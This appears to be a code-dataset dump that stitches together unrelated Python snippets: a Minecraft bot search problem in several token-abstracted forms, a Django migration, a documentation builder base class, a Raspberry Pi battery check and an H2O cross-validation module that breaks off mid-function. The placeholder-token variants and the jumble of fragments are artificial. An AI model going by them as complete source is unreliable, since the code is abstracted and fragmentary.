This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and 
abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and 
state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _ReturnProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n" ]
false
3
45969b346d6d5cbdef2f5d2f74270cf12024072d
# Generated by Django 4.1.9 on 2023-06-29 16:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("search", "0003_auto_20230209_1441"), ] operations = [ migrations.CreateModel( name="SearchSettings", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ], options={ "permissions": ( ("change_boost", "Edit boost settings for search components"), ("view_explore", "View the global search explore page"), ), "managed": False, "default_permissions": (), }, ), ]
[ "# Generated by Django 4.1.9 on 2023-06-29 16:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"search\", \"0003_auto_20230209_1441\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"SearchSettings\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n ],\n options={\n \"permissions\": (\n (\"change_boost\", \"Edit boost settings for search components\"),\n (\"view_explore\", \"View the global search explore page\"),\n ),\n \"managed\": False,\n \"default_permissions\": (),\n },\n ),\n ]\n", "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('search', '0003_auto_20230209_1441')]\n operations = [migrations.CreateModel(name='SearchSettings', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID'))], options={'permissions': ((\n 'change_boost', 'Edit boost settings for search components'), (\n 'view_explore', 'View the global search explore page')), 'managed':\n False, 'default_permissions': ()})]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('search', '0003_auto_20230209_1441')]\n operations = [migrations.CreateModel(name='SearchSettings', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID'))], options={'permissions': ((\n 'change_boost', 'Edit boost settings for search components'), (\n 'view_explore', 'View the global search explore page')), 'managed':\n False, 'default_permissions': ()})]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false
4
3fbf1768a2fe78df591c49490dfce5fb374e7fc2
from functools import wraps
import os


def restoring_chdir(fn):
    #XXX:dc: This would be better off in a neutral module
    @wraps(fn)
    def decorator(*args, **kw):
        try:
            path = os.getcwd()
            return fn(*args, **kw)
        finally:
            os.chdir(path)
    return decorator


class BaseBuilder(object):
    """
    The Base for all Builders. Defines the API for subclasses.
    All workflow steps need to return true; otherwise it is assumed something
    went wrong and the Builder will stop
    """

    workflow = ['clean', 'build', 'move']

    def __init__(self, version):
        self.version = version

    def run(self):
        for step in self.workflow:
            fn = getattr(self, step)
            result = fn()
            assert result

    @restoring_chdir
    def force(self):
        """
        An optional step to force a build even when nothing has changed.
        """
        print "Forcing a build by touching files"
        os.chdir(self.version.project.conf_dir(self.version.slug))
        os.system('touch * && touch */*')

    def clean(self):
        """
        Clean up the version so it's ready for usage.

        This is used to add RTD specific stuff to Sphinx, and to
        implement whitelists on projects as well.

        It is guaranteed to be called before your project is built.
        """
        raise NotImplementedError

    def build(self):
        """
        Do the actual building of the documentation.
        """
        raise NotImplementedError

    def move(self):
        """
        Move the documentation from its generated place to its final home.

        This needs to understand both a single-server dev environment
        and a multi-server environment.
        """
        raise NotImplementedError

    @property
    def changed(self):
        """
        Says whether the documentation has changed, and requires further action.

        This is mainly used to short-circuit more expensive builds of other
        output formats if the project docs didn't change on an update.
        Subclasses are recommended to override for more efficient builds.

        Defaults to `True`
        """
        return True
[ "from functools import wraps\nimport os\n\n\ndef restoring_chdir(fn):\n #XXX:dc: This would be better off in a neutral module\n @wraps(fn)\n def decorator(*args, **kw):\n try:\n path = os.getcwd()\n return fn(*args, **kw)\n finally:\n os.chdir(path)\n return decorator\n\n\nclass BaseBuilder(object):\n \"\"\"\n The Base for all Builders. Defines the API for subclasses.\n All workflow steps need to return true, otherwise it is assumed something\n went wrong and the Builder will stop\n \"\"\"\n\n workflow = ['clean', 'build', 'move']\n\n def __init__(self, version):\n self.version = version\n\n def run(self):\n for step in self.workflow:\n fn = getattr(self, step)\n result = fn()\n assert result\n\n @restoring_chdir\n def force(self):\n \"\"\"\n An optional step to force a build even when nothing has changed.\n \"\"\"\n print \"Forcing a build by touching files\"\n os.chdir(self.version.project.conf_dir(self.version.slug))\n os.system('touch * && touch */*')\n\n def clean(self):\n \"\"\"\n Clean up the version so it's ready for usage.\n\n This is used to add RTD specific stuff to Sphinx, and to\n implement whitelists on projects as well.\n\n It is guaranteed to be called before your project is built.\n \"\"\"\n raise NotImplementedError\n\n def build(self):\n \"\"\"\n Do the actual building of the documentation.\n \"\"\"\n raise NotImplementedError\n\n def move(self):\n \"\"\"\n Move the documentation from it's generated place to its final home.\n\n This needs to understand both a single server dev environment,\n as well as a multi-server environment.\n \"\"\"\n raise NotImplementedError\n\n @property\n def changed(self):\n \"\"\"\n Says whether the documentation has changed, and requires further action.\n\n This is mainly used to short-circuit more expensive builds of other\n output formats if the project docs didn't change on an update.\n Subclasses are recommended to override for more efficient builds.\n\n Defaults to `True`\n \"\"\"\n return True\n" ]
true
5
67b967b688aeac1270eee836e0f6e6b3555b933e
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
This program is run at regular intervals to check the battery charge status of the uninterruptible power supply.
In our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the
Raspberry Pi shutdown procedure at 3.7 V, we ensure that the processor has enough time to make a clean shutdown.

This program must be launched at regular intervals (5 minutes in our case) by the Raspberry Pi OS cron task scheduler.
The crontab -e command in the home directory opens the cron file; for example, the entry for a trigger every 5 minutes would be:
*/5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py
"""

import time
import datetime as dt

from subprocess import call
from pidcmes_lib import Pidcmes  # class for 'pidcmes' procedures

pidcmes = Pidcmes()  # initialize pidcmes class

u_bat_min = 3.7  # minimum battery voltage
n_moy = 20  # averaging to reduce glitches
stop_run = False  # to control the execution (run/stop)

u_avg = pidcmes.get_tension(n_moy)  # read the value in volts

if u_avg < u_bat_min:  # or i > 10:
    print("proper shut down of the machine due to low battery")
#    time.sleep(5)
#    call("sudo shutdown -h now", shell=True)  # shutdown the RASPI
else:
    print("tout va bien dormez braves gens")
[ "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program is run at regular intervals to check the battery charge status of the uninterruptible power supply.\nIn our case, it is a LiPo battery with a nominal voltage of 3.7 volts. By setting the voltage for the\nRaspberry PI shutdown procedure at 3.7 V,we ensure that the processor has enough time to make a clean shutdown.\n\nThis program must be launched at regular intervals (5 inute in our case) by the Raspberry PI OS cron task scheduler.\nThe crontab -e command in the home directory opens the cron file and the command line would for example be for a trigger every 5 minutes:\n5 * * * * sudo /usr/bin/python3 /home/pi/dev_python/amod/pidcmes_bbu.py\n\"\"\"\n\nimport time\nimport datetime as dt\n\nfrom subprocess import call\nfrom pidcmes_lib import Pidcmes # class for 'pidcmes' procedures\n \npidcmes = Pidcmes() # initialize pidcmese class\n\nu_bat_min = 3.7 # minumum battery voltage \nn_moy = 20 # averaging to reduce glitches\nstop_run = False # to control the execution (run/stop)\n\nu_avg = pidcmes.get_tension(n_moy) # read the value in volts\n\n \nif u_avg < u_bat_min:# or i > 10: \n print(\"proper shut down of the machine due to low battery\")\n# time.sleep(5)\n# call(\"sudo shutdown -h now\", shell=True) # shutdown the RASPI\nelse:\n print(\"tout va bien dormez braves gens\")\n", "<docstring token>\nimport time\nimport datetime as dt\nfrom subprocess import call\nfrom pidcmes_lib import Pidcmes\npidcmes = Pidcmes()\nu_bat_min = 3.7\nn_moy = 20\nstop_run = False\nu_avg = pidcmes.get_tension(n_moy)\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\npidcmes = Pidcmes()\nu_bat_min = 3.7\nn_moy = 20\nstop_run = False\nu_avg = pidcmes.get_tension(n_moy)\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\n<assignment token>\nif u_avg < u_bat_min:\n print('proper shut down of the machine due to low battery')\nelse:\n print('tout va bien dormez braves gens')\n", "<docstring token>\n<import token>\n<assignment token>\n<code token>\n" ]
false
6
c59707ba07c1659d94684c54cdd7bb2658cba935
from __future__ import division, print_function, absolute_import import numbers import warnings from abc import ABCMeta, abstractmethod import numpy as np from .base import check_frame from skutil.base import overrides from sklearn.externals import six from sklearn.base import _pprint from sklearn.utils.fixes import signature, bincount from sklearn.utils import check_random_state from math import ceil, floor try: from h2o import H2OEstimator except ImportError: from h2o.estimators.estimator_base import H2OEstimator try: from sklearn.model_selection import KFold SK18 = True except ImportError: from sklearn.cross_validation import KFold SK18 = False __all__ = [ 'check_cv', 'h2o_train_test_split', 'H2OKFold', 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit' ] def _build_repr(self): # XXX This is copied from sklearn.BaseEstimator's get_params cls = self.__class__ init = getattr(cls.__init__, 'deprecated_original', cls.__init__) init_signature = signature(init) if init is object.__init__: args = [] else: args = sorted([p.name for p in init_signature.parameters.values() if p.name != 'self' and p.kind != p.VAR_KEYWORD]) class_name = self.__class__.__name__ params = dict() for key in args: warnings.simplefilter("always", DeprecationWarning) try: with warnings.catch_warnings(record=True) as w: value = getattr(self, key, None) if len(w) and w[0].category == DeprecationWarning: continue finally: warnings.filters.pop(0) params[key] = value return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name))) def check_cv(cv=3): """Checks the ``cv`` parameter to determine whether it's a valid int or H2OBaseCrossValidator. Parameters ---------- cv : int or H2OBaseCrossValidator, optional (default=3) The number of folds or the H2OBaseCrossValidator instance. Returns ------- cv : H2OBaseCrossValidator The instance of H2OBaseCrossValidator """ if cv is None: cv = 3 if isinstance(cv, numbers.Integral): return H2OKFold(cv) if not isinstance(cv, H2OBaseCrossValidator): raise ValueError('expected int or instance of ' 'H2OBaseCrossValidator but got %s' % type(cv)) return cv def h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None): """Splits an H2OFrame into random train and test subsets Parameters ---------- frame : H2OFrame The h2o frame to split test_size : float, int, or None (default=None) If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is automatically set to the complement of the train size. If train size is also None, test size is set to 0.25 train_size : float, int, or None (default=None) If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. random_state : int or RandomState Pseudo-random number generator state used for random sampling. 
stratify : str or None (default=None) The name of the target on which to stratify the sampling Returns ------- out : tuple, shape=(2,) training_frame : H2OFrame The training fold split testing_frame : H2OFrame The testing fold split """ frame = check_frame(frame, copy=False) if test_size is None and train_size is None: test_size = 0.25 if stratify is not None: CVClass = H2OStratifiedShuffleSplit else: CVClass = H2OShuffleSplit cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size, random_state=random_state) # for the h2o one, we only need iter 0 tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0] # h2o "doesn't reorder rows" so we need to keep these sorted... train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1])) out = ( frame[train, :], frame[test, :] ) return out # Avoid a pb with nosetests... h2o_train_test_split.__test__ = False def _val_y(y): if isinstance(y, six.string_types): return str(y) elif y is None: return y raise TypeError('y must be a string. Got %s' % y) class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)): """Base class for H2O cross validation operations. All implementing subclasses should override ``get_n_splits`` and ``_iter_test_indices``. """ def __init__(self): pass def split(self, frame, y=None): """Generate indices to split data into training and test. Parameters ---------- frame : ``H2OFrame`` The h2o frame to split y : str, optional (default=None) The name of the column to stratify, if applicable. Returns ------- train : ndarray The training set indices for the split test : ndarray The testing set indices for that split """ frame = check_frame(frame, copy=False) indices = np.arange(frame.shape[0]) for test_index in self._iter_test_masks(frame, y): train_index = indices[np.logical_not(test_index)] test_index = indices[test_index] # h2o can't handle anything but lists... yield list(train_index), list(test_index) def _iter_test_masks(self, frame, y=None): """Generates boolean masks corresponding to the tests set. Parameters ---------- frame : H2OFrame The h2o frame to split y : string, optional (default=None) The column to stratify. Returns ------- test_mask : np.ndarray, shape=(n_samples,) The indices for the test split """ for test_index in self._iter_test_indices(frame, y): test_mask = np.zeros(frame.shape[0], dtype=np.bool) test_mask[test_index] = True yield test_mask def _iter_test_indices(self, frame, y=None): raise NotImplementedError('this method must be implemented by a subclass') @abstractmethod def get_n_splits(self): """Get the number of splits or folds for this instance of the cross validator. 
""" pass def __repr__(self): return _build_repr(self) def _validate_shuffle_split_init(test_size, train_size): """Validation helper to check the test_size and train_size at init""" if test_size is None and train_size is None: raise ValueError('test_size and train_size can not both be None') if test_size is not None: if np.asarray(test_size).dtype.kind == 'f': if test_size >= 1.: raise ValueError( 'test_size=%f should be smaller ' 'than 1.0 or be an integer' % test_size) elif np.asarray(test_size).dtype.kind != 'i': raise ValueError('Invalid value for test_size: %r' % test_size) if train_size is not None: if np.asarray(train_size).dtype.kind == 'f': if train_size >= 1.: raise ValueError( 'train_size=%f should be smaller ' 'than 1.0 or be an integer' % test_size) elif (np.asarray(test_size).dtype.kind == 'f' and (train_size + test_size) > 1.): raise ValueError('The sum of test_size and train_size = %f' 'should be smaller than 1.0. Reduce test_size ' 'and/or train_size.' % (train_size + test_size)) elif np.asarray(train_size).dtype.kind != 'i': raise ValueError('Invalid value for train_size: %r' % train_size) def _validate_shuffle_split(n_samples, test_size, train_size): if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples: raise ValueError('test_size=%d should be smaller ' 'than the number of samples %d' % (test_size, n_samples)) if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples: raise ValueError('train_size=%d should be smaller ' 'than the number of samples %d' % (train_size, n_samples)) if np.asarray(test_size).dtype.kind == 'f': n_test = ceil(test_size * n_samples) elif np.asarray(test_size).dtype.kind == 'i': n_test = float(test_size) if train_size is None: n_train = n_samples - n_test elif np.asarray(train_size).dtype.kind == 'f': n_train = floor(train_size * n_samples) else: n_train = float(train_size) if test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError('The sum of train_size and test_size=%d, ' 'should be smaller than the number of ' 'samples %d. Reduce test_size and/or ' 'train_size.' % (n_train + n_test, n_samples)) return int(n_train), int(n_test) class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)): """Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This is used for ``h2o_train_test_split`` in strategic train/test splits of H2OFrames. Implementing subclasses should override ``_iter_indices``. Parameters ---------- n_splits : int, optional (default=2) The number of folds or splits in the split test_size : float or int, optional (default=0.1) The ratio of observations for the test fold train_size : float or int, optional (default=None) The ratio of observations for the train fold random_state : int or RandomState, optional (default=None) The random state for duplicative purposes. """ def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None): _validate_shuffle_split_init(test_size, train_size) self.n_splits = n_splits self.test_size = test_size self.train_size = train_size self.random_state = random_state def split(self, frame, y=None): """Split the frame. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ for train, test in self._iter_indices(frame, y): yield train, test @abstractmethod def _iter_indices(self, frame, y): """Abstract method for iterating the indices. 
Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ pass def get_n_splits(self): """Get the number of splits or folds for this instance of the shuffle split. """ return self.n_splits def __repr__(self): return _build_repr(self) class H2OShuffleSplit(H2OBaseShuffleSplit): """Default shuffle splitter used for ``h2o_train_test_split``. This shuffle split class will not perform any stratification, and will simply shuffle indices and split into the number of specified sub-frames. """ def _iter_indices(self, frame, y=None): """Iterate the indices. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. Since this class does not perform stratification, ``y`` is unused. Returns ------- ind_train : np.ndarray, shape=(n_samples,) The train indices ind_test : np.ndarray, shape=(n_samples,) The test indices """ n_samples = frame.shape[0] n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size) rng = check_random_state(self.random_state) for i in range(self.n_splits): permutation = rng.permutation(n_samples) ind_test = permutation[:n_test] ind_train = permutation[n_test:(n_test + n_train)] yield ind_train, ind_test class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit): """Shuffle splitter used for ``h2o_train_test_split`` when stratified option is specified. This shuffle split class will perform stratification. """ def _iter_indices(self, frame, y): """Iterate the indices with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. Returns ------- train : np.ndarray, shape=(n_samples,) The train indices test : np.ndarray, shape=(n_samples,) The test indices """ n_samples = frame.shape[0] n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size) # need to validate y... y = _val_y(y) target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()) classes, y_indices = np.unique(target, return_inverse=True) n_classes = classes.shape[0] class_counts = bincount(y_indices) if np.min(class_counts) < 2: raise ValueError('The least populated class in y has only 1 ' 'member, which is too few. The minimum number of labels ' 'for any class cannot be less than 2.') if n_train < n_classes: raise ValueError('The train_size=%d should be greater than or ' 'equal to the number of classes=%d' % (n_train, n_classes)) if n_test < n_classes: raise ValueError('The test_size=%d should be greater than or ' 'equal to the number of classes=%d' % (n_test, n_classes)) rng = check_random_state(self.random_state) p_i = class_counts / float(n_samples) n_i = np.round(n_train * p_i).astype(int) t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)) for _ in range(self.n_splits): train = [] test = [] for i, class_i in enumerate(classes): permutation = rng.permutation(class_counts[i]) perm_indices_class_i = np.where((target == class_i))[0][permutation] train.extend(perm_indices_class_i[:n_i[i]]) test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]]) # Might end up here with less samples in train and test than we asked # for, due to rounding errors. 
if len(train) + len(test) < n_train + n_test: missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0] missing_indices = rng.permutation(missing_indices) n_missing_train = n_train - len(train) n_missing_test = n_test - len(test) if n_missing_train > 0: train.extend(missing_indices[:n_missing_train]) if n_missing_test > 0: test.extend(missing_indices[-n_missing_test:]) train = rng.permutation(train) test = rng.permutation(test) yield train, test def split(self, frame, y): """Split the frame with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. """ return super(H2OStratifiedShuffleSplit, self).split(frame, y) class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)): """Base class for KFold and Stratified KFold. Parameters ---------- n_folds : int The number of splits shuffle : bool Whether to shuffle indices random_state : int or RandomState The random state for the split """ @abstractmethod def __init__(self, n_folds, shuffle, random_state): if not isinstance(n_folds, numbers.Integral): raise ValueError('n_folds must be of Integral type. ' '%s of type %s was passed' % (n_folds, type(n_folds))) n_folds = int(n_folds) if n_folds <= 1: raise ValueError('k-fold cross-validation requires at least one ' 'train/test split by setting n_folds=2 or more') if shuffle not in [True, False]: raise TypeError('shuffle must be True or False. Got %s (type=%s)' % (str(shuffle), type(shuffle))) self.n_folds = n_folds self.shuffle = shuffle self.random_state = random_state @overrides(H2OBaseCrossValidator) def split(self, frame, y=None): """Split the frame. Parameters ---------- frame : H2OFrame The frame to split y : string, optional (default=None) The column to stratify. """ frame = check_frame(frame, copy=False) n_obs = frame.shape[0] if self.n_folds > n_obs: raise ValueError('Cannot have n_folds greater than n_obs') for train, test in super(_H2OBaseKFold, self).split(frame, y): yield train, test @overrides(H2OBaseCrossValidator) def get_n_splits(self): """Get the number of splits or folds. Returns ------- n_folds : int The number of folds """ return self.n_folds class H2OKFold(_H2OBaseKFold): """K-folds cross-validator for an H2OFrame. Parameters ---------- n_folds : int, optional (default=3) The number of splits shuffle : bool, optional (default=False) Whether to shuffle indices random_state : int or RandomState, optional (default=None) The random state for the split """ def __init__(self, n_folds=3, shuffle=False, random_state=None): super(H2OKFold, self).__init__(n_folds, shuffle, random_state) @overrides(_H2OBaseKFold) def _iter_test_indices(self, frame, y=None): n_obs = frame.shape[0] indices = np.arange(n_obs) if self.shuffle: check_random_state(self.random_state).shuffle(indices) n_folds = self.n_folds fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int) fold_sizes[:n_obs % n_folds] += 1 current = 0 for fold_size in fold_sizes: start, stop = current, current + fold_size yield indices[start:stop] current = stop class H2OStratifiedKFold(_H2OBaseKFold): """K-folds cross-validator for an H2OFrame with stratified splits. 
Parameters ---------- n_folds : int, optional (default=3) The number of splits shuffle : bool, optional (default=False) Whether to shuffle indices random_state : int or RandomState, optional (default=None) The random state for the split """ def __init__(self, n_folds=3, shuffle=False, random_state=None): super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state) def split(self, frame, y): """Split the frame with stratification. Parameters ---------- frame : H2OFrame The frame to split y : string The column to stratify. """ return super(H2OStratifiedKFold, self).split(frame, y) def _iter_test_masks(self, frame, y): test_folds = self._make_test_folds(frame, y) for i in range(self.n_folds): yield test_folds == i def _make_test_folds(self, frame, y): if self.shuffle: rng = check_random_state(self.random_state) else: rng = self.random_state # validate that it's a string y = _val_y(y) # gets a string back or None if y is None: raise ValueError('H2OStratifiedKFold requires a target name (got None)') target = frame[y].as_data_frame(use_pandas=True)[y].values n_samples = target.shape[0] unique_y, y_inversed = np.unique(target, return_inverse=True) y_counts = bincount(y_inversed) min_labels = np.min(y_counts) if np.all(self.n_folds > y_counts): raise ValueError(('All the n_labels for individual classes' ' are less than %d folds.' % self.n_folds), Warning) if self.n_folds > min_labels: warnings.warn(('The least populated class in y has only %d' ' members, which is too few. The minimum' ' number of labels for any class cannot' ' be less than n_folds=%d.' % (min_labels, self.n_folds)), Warning) # NOTE FROM 